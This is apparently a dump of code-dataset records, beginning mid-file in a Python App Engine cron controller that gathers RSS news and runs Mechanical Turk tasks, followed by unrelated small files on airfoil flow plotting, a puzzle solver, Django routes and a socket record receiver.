build_category_search_indexAction(self,page=1,limit=100):\n model={\"total\":0}\n \n model['total']=CategoryLib.buildSearchIndex(page,limit)\n if model['total']>0:\n taskqueue.add(url=\"/json/cron/build_category_search_index\")\n \n return model\n def acquire_rss_articlesAction(self,rss_url=None):\n model={'num_articles':0,\"num_queued\":0}\n if rss_url:\n rss_url=urllib2.unquote(rss_url)\n model['num_articles']=model['num_articles']+RSSLib.saveArticles(rss_url)\n logging.info(\"loaded \"+str(model['num_articles'])+\" new articles\")\n else:\n \n rssfeeds=[\n 'http://news.stanford.edu/rss/grad.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/PressReleases/rss.xml',\n 'http://www.nist.gov/rss/math.xml',\n 'http://www.fda.gov/downloads/Drugs/ResourcesForYou/HealthProfessionals/UCM220293.xml',\n 'http://www.bea.gov/rss/rss.xml',\n 'http://news.stanford.edu/rss/humanities.xml',\n 'http://www.army.mil/rss/73/',\n 'http://www.loc.gov/rss/pao/news.xml',\n 'http://www.nist.gov/rss/nanotechnology.xml',\n #'http://feeds.feedblitz.com/cbospublications&x=1',\n 'http://media.ca7.uscourts.gov/oralArguments/oar.jsp?rss=rss',\n 'http://news.stanford.edu/rss/health.xml',\n 'http://www.army.mil/rss/71/',\n 'http://www.humanrights.gov/feed/',\n 'https://www.cia.gov/news-information/your-news/cia-newsroom/RSS.xml',\n 'http://www.nist.gov/rss/physics.xml',\n 'http://www.state.gov/rss/channels/cec.xml',\n 'http://news.stanford.edu/rss/international.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/TDS/rss.xml',\n 'http://www.army.mil/rss/284/',\n 'http://www.state.gov/rss/channels/scrs.xml',\n 'http://travel.state.gov/_res/rss/TWs.xml',\n 'http://www.nist.gov/rss/transportation.xml',\n 
'http://www.usaid.gov/rss/press-releases.xml',\n 'http://www.usgs.gov/rss/news.rss',\n 'http://ars.usda.gov/news/rss/rss.htm',\n 'http://travel.state.gov/_res/rss/TAs.xml',\n 'http://www.nist.gov/rss/chemistry.xml',\n 'http://www.state.gov/rss/channels/inl.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/PetHealth/rss.xml',\n 'http://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfTopic/cdrhnew-rss.cfm',\n 'http://www.nist.gov/rss/electronicsandtelecommunications.xml',\n 'http://www.state.gov/rss/channels/ct.xml',\n \"http://www.simonsfoundation.org/quanta-archive/feed/\",\n 'http://www.state.gov/rss/channels/acis.xml',\n \"http://angeion.me/feed/\",\n \"http://www.darpa.mil/Rss.aspx?Colid=24\",\n 'http://www.state.gov/rss/channels/highlights.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/Drugs/rss.xml',\n \"https://www.thecsiac.com/aggregator/rss\",\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/FoodAllergies/rss.xml',\n 'http://www.csrees.usda.gov/rss/research.xml',\n 'http://www.raconline.org/rss/pubs.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/Consumers/rss.xml',\n 'http://www.eia.gov/energy_in_brief/eibinfo.cfm',\n 'http://www.raconline.org/rss/news.xml',\n 'http://www.ferc.gov/xml/whats-new.xml',\n 'http://feeds.feedburner.com/NrelFeatureStories?format=xml',\n 'http://yosemite.epa.gov/opa/admpress.nsf/RSSByCategory?open&category=Air',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/AnimalVeterinary/rss.xml',\n 'http://www.eia.gov/about/new/wntest3.cfm',\n 'http://yosemite.epa.gov/opa/admpress.nsf/RSSByCategory?open&category=Hazardous%20Waste',\n 'http://sanctuaries.noaa.gov/feed.xml',\n 'http://yosemite.epa.gov/opa/admpress.nsf/RSS/research?opendocument',\n 'http://www.nodc.noaa.gov/OC5/RSS/wod_updates.xml',\n 'http://oceanservice.noaa.gov/rss/oceanfacts.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/FoodSafety/rss.xml',\n 'http://yosemite.epa.gov/opa/admpress.nsf/RSSByCategory?open&category=Water',\n 'http://wwwnc.cdc.gov/travel/rss/notices.xml',\n 'http://publications.nigms.nih.gov/biobeat/rss/current.xml',\n 'http://www.nodc.noaa.gov/SatelliteData/pathfinder4km/pathfinder_news_rss.xml',\n 'http://www.nih.gov/news/feed.xml',\n 'http://www2c.cdc.gov/podcasts/createrss.asp?t=r&c=340',\n 'http://www.niehs.nih.gov/news/newsroom/rssfeed/rss_news.xml',\n 'http://www.us-cert.gov/ncas/all.xml',\n 'http://www2c.cdc.gov/podcasts/createrss.asp?t=r&c=20',\n 'http://www.nasa.gov/rss/dyn/image_of_the_day.rss',\n 'http://www2c.cdc.gov/podcasts/createrss.asp?t=r&c=513',\n 'http://www.sti.nasa.gov/scan/rss99-01.xml',\n 'http://www.us-cert.gov/ncas/tips.xml',\n 'http://earthobservatory.nasa.gov/Feeds/rss/eo.rss',\n 'http://library.bldrdoc.gov/news.xml',\n 'http://www.darpa.mil/Rss.aspx?Colid=24',\n 'http://www.nasa.gov/rss/dyn/breaking_news.rss',\n 'http://www.nij.gov/documents/rss-main.xml',\n 'http://www.nist.gov/rss/bioscienceandhealth.xml',\n 'http://rss.xerox.com/xerox-news',\n 'http://www.nist.gov/rss/forensics.xml',\n 'http://www.nsf.gov/rss/rss_www_news.xml',\n \"http://feeds.feedburner.com/TheHackersNews?format=xml\",\n 'http://www.nist.gov/rss/buildingandfireresearch.xml',\n 'http://web.ornl.gov/ornlhome/rss/ornl_in_news.xml',\n 'http://apps1.eere.energy.gov/news/rss/enn.xml',\n 'http://www.nist.gov/rss/informationtechnology.xml',\n 'http://web.ornl.gov/ornlhome/rss/sns_news.xml',\n 'http://www.ntia.doc.gov/rss/updates.xml',\n 'http://news.stanford.edu/rss/arts.xml',\n 
'http://www.stanford.edu/group/knowledgebase/cgi-bin/feed/',\n 'http://www.nist.gov/rss/manufacturing.xml',\n 'http://news.stanford.edu/rss/environment.xml',\n 'https://newsoffice.mit.edu/rss/school/architecture-and-planning',\n 'https://newsoffice.mit.edu/rss/research',\n 'http://www.nsf.gov/rss/rss_www_discoveries.xml',\n 'http://www.nsf.gov/rss/rss_www_news.xml',\n 'http://www.nsf.gov/rss/rss_www_news_field.xml',\n 'http://news.tamhsc.edu/feed/',\n 'http://www.nsbri.org/RSS/default.asp?ChannelTitle=Science%20and%20Technology&ChannelDesc=Science%20and%20Technology&Category=Science%20and%20Technology',\n 'http://www.janes.com/rss',\n 'http://www.justice.gov/rss/rss.opa.hp.xml',\n 'http://www.justice.gov/rss/rss.crm.hp.xml',\n 'http://www.justice.gov/atr/rss/atr_press.xml',\n #'http://feeds.feedburner.com/WIREAwardsWatch?format=xml',\n #'http://feeds.feedburner.com/indiewireTelevision?format=xml',\n 'http://feeds.feedburner.com/Criticwire?format=xml',\n #'http://feeds.feedburner.com/sundancefest_all',\n 'http://feeds.feedburner.com/WUSTL-Top-Stories-News',\n #'http://feeds.feedburner.com/indieWIREFesitvals?format=xml',\n 'http://rss.feedsportal.com/c/662/f/8410/index.rss',\n 'http://i.rottentomatoes.com/syndication/rss/top_news.xml',\n 'http://feeds.feedburner.com/alistapart/main?format=xml',\n 'http://www.pewresearch.org/feed/',\n 'http://feeds.feedburner.com/ncictresults?format=xml',\n 'http://feeds.feedburner.com/ncinewsreleases?format=xml',\n 'http://www.idiap.ch/the-institute/news/institute-news/RSS',\n #'http://feeds.feedburner.com/indieWIRENews?format=xml',\n 'http://www.idiap.ch/scientific-research/news/news/RSS',\n 'http://feeds.feedburner.com/Ifpriupdate',\n 'http://feeds.feedburner.com/IfpriPressReleases',\n 'http://feeds.feedburner.com/ilrinews',\n 'http://jp.fujitsu.com/group/fri/en/rss/fri-message.rss',\n 'http://jp.fujitsu.com/group/fri/en/rss/fri-reserchreport.rss',\n 'http://feeds.feedburner.com/NhgriPressReleases?format=xml',\n 'http://feeds.feedburner.com/WUSTL-ArtSci-News',\n \n ];\n # feeds that require custom ingestor\n #'http://www.hopkinsmedicine.org/news/media/releases',\n \n #http://www.ed.ac.uk/schools-departments/medicine-vet-medicine/news-events/all-news/latest-news\n #http://wcatwc.arh.noaa.gov/events/xml/PAAQAtom.xml\n #http://www.bnl.gov/bnlweb/rss.asp\n #http://ehp.niehs.nih.gov/feed/\n #http://www.nidcr.nih.gov/nidcr2.nih.gov/Rss/?Channel=/Research/ResearchResults/NewsReleases/\n #http://www.nidcr.nih.gov/nidcr2.nih.gov/Rss/?Channel=/Research/ResearchResults/ScienceBriefs/\n #http://apps3.eere.energy.gov/greenpower/gpn_rss.php\n #http://www.prh.noaa.gov/cphc/index-cp.xml\n #http://web.ornl.gov/ornlhome/rss/doepulse.xml\n #http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/Food/rss.xml\n #http://app.feeddigest.com/digest3/HD4A0PA7ON.rss\n #http://www.ed.gov/feed\n #http://ies.ed.gov/ncer/whatsnew/whatsnew_rss.asp\n #http://www.state.gov/rss/channels/pending.xml\n #http://www.state.gov/rss/channels/whatsnew.xml\n #http://www.state.gov/rss/channels/treatyactions.xml\n #http://www.state.gov/rss/channels/tef.xml\n #http://www.state.gov/rss/channels/statecraft.xml \n #http://www.state.gov/rss/channels/alldos.xml\n #http://www.state.gov/rss/channels/ds.xml\n #http://www.state.gov/rss/channels/opengov.xml\n #http://www.state.gov/rss/channels/social.xml\n #http://www.state.gov/rss/channels/eeati.xml\n #http://www.state.gov/rss/channels/gcj.xml\n num_feeds=len(rssfeeds)\n pagesize=int(math.ceil((0.0+num_feeds)/(0.0+24)))\n 
offset=(datetime.datetime.now().hour)*pagesize\n for i in range(offset,offset+pagesize):\n if i>=num_feeds:\n break\n model['num_queued']=model['num_queued']+1\n logging.info(\"queued \"+rssfeeds[i])\n rss_url=urllib2.quote(rssfeeds[i],\"\\n\")\n taskqueue.add(url=\"/json/cron/acquire_rss_articles\",params={'rss_url':rss_url},retry_options=taskqueue.TaskRetryOptions(task_retry_limit=0))\n \n \n return model\n \n \n \"\"\"\n Archive articles that people are losing interest in\n \"\"\"\n def archive_articlesAction(self):\n \n model={\"total\":[]}\n return model\n \n page=0\n limit=10\n total=0\n articles=[1]\n #articles=ArticleModel.all(keys_only=True).order(\"-sortkey\").fetch(limit,100+(page*limit))\n while articles:\n articles=ArticleModel.all().filter(\"archived =\",False).order(\"-updated\").fetch(limit,(page*limit)+100)\n page=page+1\n for article in articles:\n article.archived=True\n total=total+1\n article.save()\n # also archive the article cateogories \n article_categories=ArticleLib.getArticleCategories(article, False)\n for article_category in article_categories:\n article_category.archived=True\n article_category.save()\n \n \n \n # remove articles that have been in the top 10 more than a day\n articles=ArticleModel.all().filter(\"archived =\",False).order(\"-sortkey\").fetch(10,0)\n \n for article in articles:\n elapsed=datetime.datetime.now()-article.updated\n if elapsed.total_seconds()>86400: \n article.archived=True\n total=total+1\n article.save() \n # also archive the article cateogories \n article_categories=ArticleLib.getArticleCategories(article, False)\n for article_category in article_categories:\n article_category.archived=True\n article_category.save()\n \n model['total']=total\n logging.info(\"archived \"+str(total)+\" articles\")\n \n return model\n \n \n \n \"\"\"\n finds HITS that have been approved and whose results have been saved and removed them from mechanical turk\n \"\"\"\n def remove_old_approved_hitsAction(self):\n m=MturkLib()\n num_hits=m.remove_old_approved_hits();\n \n model={\"num_hits\":num_hits}\n message=\"removed \"+str(num_hits)+\" old approved hits\"\n logging.info(message)\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'remove_old_approved_hits results',message)\n return NullView(model)\n\n def get_question_hitsAction(self):\n model={\"approved_hits\":0}\n model['approved_hits']=MturkController().get_question_hitsAction()\n message=\"got \"+str(model['approved_hits'])+\" new questions from mechanical turk\"\n logging.info(message)\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'get_question_hits results',message)\n \n return model\n \n \n def get_fibquestion_hitsAction(self):\n model={\"approved_hits\":0}\n model['approved_hits']=MturkController().get_fibquestion_hitsAction()\n message=\"got \"+str(model['approved_hits'])+\" new questions from mechanical turk\"\n logging.info(message)\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'get_fibquestion_hits results',message)\n \n return model\n \n def turk_creates_questionAction(self,num_questions=10):\n try:\n num_questions=int(num_questions)\n model =MturkController().create_questionAction(num_questions)\n \n message=\"sent \"+str(model['numsentences'])+\" sentences to mechanical turk for conversion to a question\"\n except ValueError:\n message=\"invalid value for parameter num_questions: \"+(str(num_questions)) \n \n \n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'turk_creates_question results',message)\n return model\n \n 
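The acquire_rss_articles cron above spreads a static feed list across 24 hourly runs: ceil-division fixes the batch size, and the current hour picks the slice. The same arithmetic as a standalone, testable sketch (the names are mine):

import math

def hourly_batch(items, hour, runs_per_day=24):
    # ceil so every item lands in some run; the last few hours may get an empty slice
    pagesize = math.ceil(len(items) / runs_per_day)
    start = hour * pagesize
    return items[start:start + pagesize]

feeds = ['feed%d' % i for i in range(150)]
assert sum(len(hourly_batch(feeds, h)) for h in range(24)) == len(feeds)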
def turk_creates_fibquestionAction(self,num_questions=10):\n try:\n num_questions=int(num_questions)\n model =MturkController().create_fib_questionAction(num_questions)\n message=\"sent \"+str(model['numsentences'])+\" sentences to mechanical turk for conversion to a question\"\n except ValueError:\n message=\"Invalid value for parameter num_questions: \"+str(num_questions)\n \n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'turk_creates_fibquestion results',message)\n return model\n \n def getsentencehitsAction(self):\n model=MturkController().getsentencehitsAction()\n message=\"got \"+str(model['num_sentences'])+\" sentences from mechanical turk\"\n logging.info(message)\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'getsentencehits results',message)\n return model\n \n def remove_approved_turk_hitsAction(self):\n MturkLib().remove_old_approved_hits()\n return None\n \n def indexAction(self):\n\n return NullView()\n \n def acquire_latest_usatoday_headlinesAction(self):\n model={'message':None}\n articles=UsaTodayLib().save_latest_headlines()\n model['message']=\"got \"+str(len(articles))+\" new articles from usatoday\"\n logging.info(model['message'])\n \n #mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'acquire_latest_usatoday_headlines results',model['message'])\n \n self.categorize_articlesAction()\n return model\n def acquire_ap_latest_headlinesAction(self):\n \n aplib=AssociatedPressLib()\n aplib.save_latest_headlines()\n #taskqueue.add(url=\"/json/cron/map_categories_to_wiki\")\n \n \n \n #TODO: tasqueue.add(url=\"/cron/acquire_sentences\");\n return NullView()\n \n \"\"\"\n attempts to set the value for CategoryModel.wikiname.\n for all categorymodels having no wikiname it asks wikipedia if it knows of such category. 
\n \"\"\"\n def map_categories_to_wikiAction(self):\n model={'message':\"\"}\n num_missing_cats=ArticleLib.map_categories_to_wiki()\n model['message']='Found '+str(num_missing_cats)+\" categories that I cant find a page in wikipedia for\"\n logging.info(model['message'])\n #mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'map_categories_to_wiki results',model['message'])\n \n return model\n \n \"\"\"\n find the latest articles and get wiki pages that are related to them\n \"\"\"\n def acquire_wiki_pagesAction(self,category=None):\n model={'message':\"\",'total':0}\n cats={}\n \n if category:\n cat=CategoryLib.getByTag(category)\n if not cat:\n logging.error(\"Category \"+category+\" not found\")\n return None\n if not cat.wikiname:\n #cat.wikiname=\"Fashion\"\n #cat.save()\n logging.error(\"no wiki category for \"+category)\n return None\n \n cats[category]=cat\n else:\n # get categories from latest articles\n articles=ArticleModel.all().order(\"updated\").fetch(10,0)\n for article in articles:\n article_cats=ArticleLib.getCategories(article)\n for cat in article_cats:\n if not cats.has_key(cat.name):\n cats[cat.name]=cat\n \n if not cats:\n model['message']='No articles have any categories!'\n \n for category_name in cats:\n if cats[category_name].wikiname:\n wikicat=WikiCategoryModel.all().filter(\"name =\",cats[category_name].wikiname).get()\n if wikicat:\n wikis=WikiModel.all().filter(\"category in\",[wikicat.key()]).fetch(1,0)\n if wikis:\n logging.info(\"We already have pages for \"+wikicat.name)\n else:\n wikis=WikiLib.getPages(wikicat);\n model['total']=model['total']+len(wikis)\n for wiki in wikis:\n if not wiki.title:\n logging.info(\"wiki record \"+str(wiki.key())+\" has no title\")\n continue\n \n pagecats=WikiLib.getPageCategories(wiki.title)\n flag=False\n for cat in pagecats:\n if cat.key() not in wiki.categories:\n flag=True\n #logging.info(\"tagging wiki page \"+wiki.title+\" with category \"+cat.name)\n wiki.categories.append(cat.key())\n \n if flag:\n \n wiki.save()\n \n #model['message']=\"found \"+str(len(wikis))+\" wiki pages for category \"+wikicat.name+\"\\n\"\n \n \n #if wikis:\n # for wiki in wikis:\n # taskqueue.add(url=\"/cron/acquire_sentences/\"+str(wiki.key()))\n #else:\n # logging.info(\"we dont have any pages for \"+article_cat.category.name)\n else: \n logging.info('cant find wikicategory where name='+str(cats[category_name].wikiname))\n else:\n logging.info('category '+cats[category_name].name+' has no wikicategory')\n # its often the case that there will be a wiki page having the exact same name as the category.\n # so lets try to get it\n \n model['message']=model['message']+\"\\n\"+\"found \"+str(model['total'])+\" wiki pages\"\n logging.info(model['message'])\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', \"acquire_wiki_pages results\",model['message']) \n \n return model\n \"\"\"\n gets sentences for the given page\n @param key: a datastore key for a wikimodel record \n \"\"\"\n def acquire_sentencesAction(self,key=None,category=None):\n model={'message':''}\n if key:\n wiki=WikiModel.get(key)\n \n elif category:\n cat=CategoryLib.getByTag(category)\n if not cat:\n logging.error(\"Category \"+category+\" not found\")\n return None\n if not cat.wikiname:\n logging.error(\"no wiki category for \"+category)\n return None\n wikicat=WikiLib.getCategoryByName(cat.wikiname)\n if not wikicat:\n logging.error(\"wiki category '\"+cat.wikiname+\"' not found\")\n return None\n wiki=WikiModel.all().filter(\"categories 
=\",wikicat).order(\"date_updated\").get()\n else:\n wikis=WikiModel.all().order(\"date_updated\").fetch(10,0)\n if wikis:\n wiki=wikis[0]\n key=wikis[0].key()\n \n \n #for all newly acquired pages, acquire sentences\n if wiki:\n t=wiki.url.split('/')\n if len(t)>0:\n title=t[len(t)-1]\n if not wiki.title:\n #wiki.title=unicode(title,errors='ignore')\n wiki.title=title.encode(\"utf-8\")\n wiki.save()\n \n sentencecount=WikiLib.getSentences(wiki)\n model['message']=\"acquired \"+str(sentencecount)+\" sentences for page \"+wiki.url.encode(\"utf-8\")\n wiki.numsentences=sentencecount\n wiki.date_updated=datetime.datetime.now()\n wiki.save()\n else:\n model['message']=\"no sentences found!\"\n \n\n logging.info(model['message'])\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', \"acquire_sentences results\",model['message']) \n \n return model\n \n def turk_classifies_sentencesAction(self):\n model={\"numsentences\":0}\n message=\"\"\n \n sentences=SentenceModel.all().filter(\"status =\",0).order(\"updated\").fetch(5,0) # get all unprocessed sentences\n \n #for sentence in sentences:\n # logging.info(sentence.sentence)\n # logging.info(\"type=\"+str(sentence.type))\n \n if len(sentences)==0:\n logging.info('no sentences found')\n else:\n mt_lib=MturkLib()\n price=0.05\n balance=mt_lib.getAccountBalance()\n if balance < price*len(sentences):\n message=message+'you dont have enough money to run Mturk.classify_sentences()'+\"\\n\"\n else:\n message=\"sent \"+str(len(sentences))+\" to mechanical turk for classification\"+\"\\n\"\n mt_lib.classify_sentences(sentences)\n \n model['numsentences']=len(sentences)\n \n logging.info(message)\n \n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'turk_classifies_sentences results',message)\n return NullView(model)\n \n def turk_gets_sentence_subject(self):\n m=MturkLib()\n \n # get a list of sentences that have been classified but dont have any questions attached\n sentences=[]\n for sentence in sentences:\n m.get_main_subject(sentence);\n \n model={\"num_sentences\":len(sentences)}\n return NullView(model)\n \n \n \"\"\"\n Attempt to categories the most recent articles that have no categories\n \"\"\" \n def categorize_articlesAction(self):\n \n page=1\n limit=100\n articles=[1]\n article_cats=None\n while articles and not article_cats:\n article_cats=None\n articles=ArticleModel.all().order(\"-created\").fetch(limit,(page-1)*limit)\n page=page+1\n for article in articles:\n article_cats=ArticleLib.getCategories(article,False)\n if not article_cats:\n taskqueue.add(queue_name=\"articleclassify\",url='/json/article/classify/'+str(article.key()))\n \n return None\n \n \n def calculate_top_articlesAction(self):\n \n \n model={\"records\":[]}\n \n \n \"\"\"\n from webapp2_extras.appengine.auth.models import User\n users=User.query().iter()\n user=users.next() \n while user:\n logging.info(user.auth_ids[0])\n try:\n user=users.next()\n except StopIteration:\n user=None \n \"\"\"\n ArticleLib.recalculate_all_sortkeys()\n \n return model\n \n def calculate_top_commentsAction(self):\n model={}\n \n CommentsLib.calculateTopComments()\n \n return model\n \n ","repo_name":"saidwords/syytacit","sub_path":"module/cron/CronController.py","file_name":"CronController.py","file_ext":"py","file_size_in_byte":30635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4035087675","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math \nfrom plot_airfoil import 
plot_airfoil\n\ndef plot_exact(x,y,X,Y,r,theta,m,n,a,b,B,e,mu,Uinf,alpha):\n\t\n\tdr = (b-a)/n\n\tdtheta = 2*math.pi/m\n\tGamma = 4*math.pi*Uinf*a*np.sin(alpha) #Kutta condition\t\n\t# Vr, Vt and Cp in cilindrical coords\n\tVr = Uinf*(1-B**2/r**2)*np.cos(theta-alpha)\n\tVt = -Uinf*(1+B**2/r**2)*np.sin(theta-alpha) - Gamma/\t(2*math.pi*r)\n\n\tCp = 1 - (Vr**2+Vt**2)/Uinf**2\n\n\t# Velocity in cartesian \t\n\t\n\tU = Vr*np.cos(theta) - Vt*np.sin(theta)\n\tV = Vr*np.sin(theta) + Vt*np.cos(theta)\n\t\n\t## Jacobian of the given mapping X,Y\n\t\n\tdrdx = x/r\n\tdrdy = y/r\n\tdthetadx = -y/r**2\n\tdthetady = x/r**2\n\n\tdXdr = np.zeros((n+1,m))\n\tdXdtheta = np.zeros((n+1,m))\n\tdYdr = np.zeros((n+1,m))\n\tdYdtheta = np.zeros((n+1,m))\n\n\tfor j in range(1,int(m-1)):\n\t\tfor i in range(1,int(n)):\n\t\t\tdXdr[i,j] = (X[i+1,j] - X[i-1,j])/(2*dr)\n\t\t\tdXdtheta[i,j] = (X[i,j+1] - X[i,j-1])/(2*dtheta)\n\t\t\tdYdr[i,j] = (Y[i+1,j] - Y[i-1,j])/(2*dr)\n\t\t\tdYdtheta[i,j] = (Y[i,j+1] - Y[i,j-1])/(2*dtheta)\n\t\tdXdr[0,j] = (X[1,j] - X[0,j])/dr\n\t\tdXdr[n,j] = (X[n,j] - X[n-1,j])/dr\n\t\tdXdtheta[0,j] = (X[0,j+1] - X[0,j-1])/(2*dtheta)\n\t\tdXdtheta[n,j] = (X[n,j+1] - X[n,j-1])/(2*dtheta)\n\t\tdYdr[0,j] = (Y[1,j] - Y[0,j])/dr\n\t\tdYdr[n,j] = (Y[n,j] - Y[n-1,j])/dr\n\t\tdYdtheta[0,j] = (Y[0,j+1] - Y[0,j-1])/(2*dtheta)\n\t\tdYdtheta[n,j] = (Y[n,j+1] - Y[n,j-1])/(2*dtheta)\n\n\t## For j=0\n\tfor i in range(1,int(n)):\n\t\tdXdr[i,0] = (X[i+1,0] - X[i-1,0])/(2*dr)\n\t\tdXdtheta[i,0] = (X[i,1] - X[i,m-1])/(2*dtheta)\n\t\tdYdr[i,0] = (Y[i+1,0] - Y[i-1,0])/(2*dr)\n\t\tdYdtheta[i,0] = (Y[i,1] - Y[i,m-1])/(2*dtheta)\n\tdXdr[0,0] = (X[1,0] - X[0,0])/dr\n\tdXdr[n,0] = (X[n,0] - X[n-1,0])/dr\n\tdXdtheta[0,0] = (X[0,1] - X[0,m-1])/(2*dtheta)\n\tdXdtheta[n,0] = (X[n,1] - X[n,m-1])/(2*dtheta)\n\tdYdr[0,0] = (Y[1,0] - Y[0,0])/dr\n\tdYdr[n,0] = (Y[n,0] - Y[n-1,0])/dr\n\tdYdtheta[0,0] = (Y[0,1] - Y[0,m-1])/(2*dtheta)\n\tdYdtheta[n,0] = (Y[n,1] - Y[n,m-1])/(2*dtheta)\n\t\n\n\t## For j=m-1\n\tfor i in range(1,int(n)):\n\t\tdXdr[i,m-1] = (X[i+1,m-1] - X[i-1,m-1])/(2*dr)\n\t\tdXdtheta[i,m-1] = (X[i,0] - X[i,m-2])/(2*dtheta)\n\t\tdYdr[i,m-1] = (Y[i+1,m-1] - Y[i-1,m-1])/(2*dr)\n\t\tdYdtheta[i,m-1] = (Y[i,0] - Y[i,m-2])/(2*dtheta)\n\tdXdr[0,m-1] = (X[1,m-1] - X[0,m-1])/dr\n\tdXdr[n,m-1] = (X[n,m-1] - X[n-1,m-1])/dr\n\tdXdtheta[0,m-1] = (X[0,0] - X[0,m-2])/(2*dtheta)\n\tdXdtheta[n,m-1] = (X[n,0] - X[n,m-2])/(2*dtheta)\n\tdYdr[0,m-1] = (Y[1,m-1] - Y[0,m-1])/dr\n\tdYdr[n,m-1] = (Y[n,m-1] - Y[n-1,m-1])/dr\n\tdYdtheta[0,m-1] = (Y[0,0] - Y[0,m-2])/(2*dtheta)\n\tdYdtheta[n,m-1] = (Y[n,0] - Y[n,m-2])/(2*dtheta)\n\n\t## Now the Jacobian in cartesian \n\t\n\tdXdx = dXdr*drdx + dXdtheta*dthetadx\n\tdXdy = dXdr*drdy + dXdtheta*dthetady\n\tdYdx = dYdr*drdx + dYdtheta*dthetadx\n\tdYdy = dYdr*drdy + dYdtheta*dthetady\n\t\n\t## Velocity fields in the real domain using Jacobian mapping\n\n\tUreal = U*dXdx + V*dXdy\n\tVreal = U*dYdx + V*dYdy\n\t\n\t## Plotting in the real plane\n\t\n\tfig2 = plt.figure(2)\n\tplt.contour(X,Y,Cp,24)\n\tplot_airfoil(e,mu,a)\n\tplt.title('Pressure coefficient')\n\tplt.axis('equal')\n\t\n\tfig3 = plt.figure(3)\n\tplt.quiver(X,Y,Ureal,Vreal)\n\tplot_airfoil(e,mu,a)\n\tplt.title('Velocity field')\n\tplt.axis('equal')\n\t\n\t## Plotting the grids\n\n\tfig4 = plt.figure(4)\n\tplt.plot(x,y,'b.')\n\tcircle3 = plt.Circle((e,mu),radius=a,fill=False)\n\tplt.gcf().gca().add_artist(circle3)\n\tplt.title('Cylinder plane grid')\n\tplt.plot(x[1,:],y[1,:],'r.')\n\tplt.plot(x[2,:],y[2,:],'g.')\n\n\tfig5 = 
plt.figure(5)\n\tplt.plot(X,Y,'b.')\n\tplot_airfoil(e,mu,a)\n\tplt.title('Real plane grid')\n\tplt.plot(X[1,:],Y[1,:],'r.')\n\tplt.plot(X[2,:],Y[2,:],'g.')\t\n\t\n\treturn [fig2, fig3, fig4, fig5]\t\n\t\n","repo_name":"aramisentreri/CFD-projects","sub_path":"plot_exact.py","file_name":"plot_exact.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23386353241","text":"def check(grass,m,n):\n rmax = []\n cmax = []\n for i in range(m):\n row = grass[i*n:i*n + n]\n rmax.append(max(row))\n print(row)\n\n for i in range(n):\n col = grass[i::n]\n cmax.append(max(col))\n\n for i in range(n):\n for j in range(m):\n if grass[j*n + i] < min(rmax[j],cmax[i]):\n return \"NO\"\n\n return \"YES\"\n\nf_in = open(\"input.txt\")\nf_out = open(\"output.txt\",\"+w\")\nn_cases = int(f_in.readline())\ncase = 0\nwhile(case//',views.task_detail,name='task_d'),\n path('tasks///complete/',views.completeTask,name='task_c'),\n path('tasks///delete/',views.deleteTask,name='task_del'),\n path('blog/',views.menajes_blog,name='blog'),\n path('blog///',views.deleteMensaje,name=\"mensaje_del\"),\n path('tasks/subtask/delete///',views.delete_subtask,name='subtask_del'),\n path('task///subtask/create/',views.create_subtask,name='create_subtask'),\n path('tasks/subtask_detail///',views.subtask_detail,name='subtask_d'),\n path('blog/private///',views.chat_privado,name='private_chat'),\n path('blog/private/delete////',views.deletePrivateMensaje,name='pm_del')\n]\n","repo_name":"DanielMonto/app","sub_path":"app-files/app_auth_tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4754625007","text":"import socket\nfrom genpickle import gen_pickle, gen_unpickle\n\n\ndef receivefrom(addr):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(addr)\n s.listen(5)\n c, a = s.accept()\n for item in gen_unpickle(c.makefile(mode='rb')):\n yield item\n c.close()\n\n\nif __name__ == '__main__':\n for r in receivefrom(('0.0.0.0', 3333)):\n print('[{}] {}'.format(r['host'], r['request']))\n","repo_name":"jsculsp/TCP-nginx-","sub_path":"receivefrom/receivefrom.py","file_name":"receivefrom.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35006639330","text":"import re\nimport sys\n\ndec_digit = '[0-9]'\nhex_digit = f'{dec_digit}|[a-f]|[A-F]'\nexp = 'p|P'\nsuff = '(f|F|l|L)?' 
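The plot_exact routine above builds the Jacobian of the mapping from hand-rolled central differences, with one-sided stencils at the r boundaries. numpy ships the same scheme as np.gradient; a hedged sketch on a small placeholder grid. Note that np.gradient also uses one-sided differences at the theta edges, so it will not reproduce the periodic wrap the original applies at the j=0 and j=m-1 seam.

import numpy as np

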